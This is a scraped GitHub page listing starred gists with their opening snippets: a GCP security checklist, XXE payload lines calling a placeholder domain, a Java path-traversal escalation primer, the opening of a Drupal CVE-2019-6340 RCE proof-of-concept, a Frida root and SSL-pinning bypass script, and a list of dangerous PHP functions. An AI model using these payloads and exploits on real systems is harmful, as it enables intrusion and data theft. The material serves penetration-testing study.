Skip to content

Instantly share code, notes, and snippets.

View hieuha's full-sized avatar
🏠
Working from home

Harry Ha hieuha

🏠
Working from home
99 followers · 113 following
View GitHub Profile
@mikesparr
mikesparr / secure-gcp-checklist.md
Created January 11, 2021 02:37
Secure Google Cloud Platform Checklist

Secure GCP infrastructure checklists

Initial setup

  • Configure org policies
    • Restrict allowed IAM domains
    • Disable key download
    • Disable default network
    • Disable external IP
    • Require shielded VM
  • Prepare for VPC service controls (data protection)
@honoki
honoki / xxe-payloads.txt
Last active November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@imran-parray
imran-parray / paramReplacer.py
Created May 23, 2020 05:40
import re
import sys
urls=[]
try:
file_name=sys.argv[1]
replacement=sys.argv[2]
except:
print("[!] Enter urls file name")
@harisec
harisec / exploit_path_traversals_in_Java_webapps.txt
Created April 27, 2020 10:24
quick primer on how to exploit path traversals in Java web apps (i.e. you can read WEB-INF/web.xml)
so, you can read WEB-INF/web.xml. how can you escalate this issue?
[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml.
use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan):
https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
with time you can build your own wordlist adding files you've discovered over time.
use Burp Intruder for this, it's perfect for this job.
sort Intruder results by status code so you can see instantly which files were found.
@ssstonebraker
ssstonebraker / Active Directory Attacks.md
Last active January 15, 2025 00:06
Active Directory Attacks #oscp
@leonjza
leonjza / cve-2019-6340.py
Last active February 27, 2020 18:39
CVE-2019-6340
#!/usr/bin/env python3
# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
# 2019 @leonjza
# Technical details for this exploit is available at:
# https://www.drupal.org/sa-core-2019-003
# https://www.ambionics.io/blog/drupal8-rce
# https://twitter.com/jcran/status/1099206271901798400
@saibikalpa
saibikalpa / root-ssl-pin-bypass.js
Last active June 2, 2022 08:25
root & ssl pinning bypass with Frida
Java.perform(function(){
console.log("\nRoot detection & SSL pinning bypass with Frida");
var CertificateFactory = Java.use("java.security.cert.CertificateFactory");
var FileInputStream = Java.use("java.io.FileInputStream");
var BufferedInputStream = Java.use("java.io.BufferedInputStream");
var X509Certificate = Java.use("java.security.cert.X509Certificate");
var KeyStore = Java.use("java.security.KeyStore");
var TrustManagerFactory = Java.use("javax.net.ssl.TrustManagerFactory");
var SSLContext = Java.use("javax.net.ssl.SSLContext");
var Volley = Java.use("com.android.volley.toolbox.Volley");
@LiveOverflow
LiveOverflow / AcoraidaMonicaGame.sol
Last active January 24, 2025 19:53
Acoraida Monica
pragma solidity =0.4.25;
contract AcoraidaMonicaGame{
uint256 public version = 4;
string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?";
string public constant sampleQuestion = "Who is Acoraida Monica?";
string public constant sampleAnswer = "$*!&#^[` [email protected];Ta&*T` R`<`~5Z`^5V You beat me! :D";
Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3);
address questioner;
string public question;
@mccabe615
mccabe615 / phpdangerousfuncs.md
Last active March 10, 2025 08:05
Dangerous PHP Functions

Command Execution

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
@AvasDream
AvasDream / htb.md
Last active February 5, 2025 04:39
Cheatsheet for HackTheBox

Purpose

Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.

Because a smart man once said:

Never google twice.

Linux General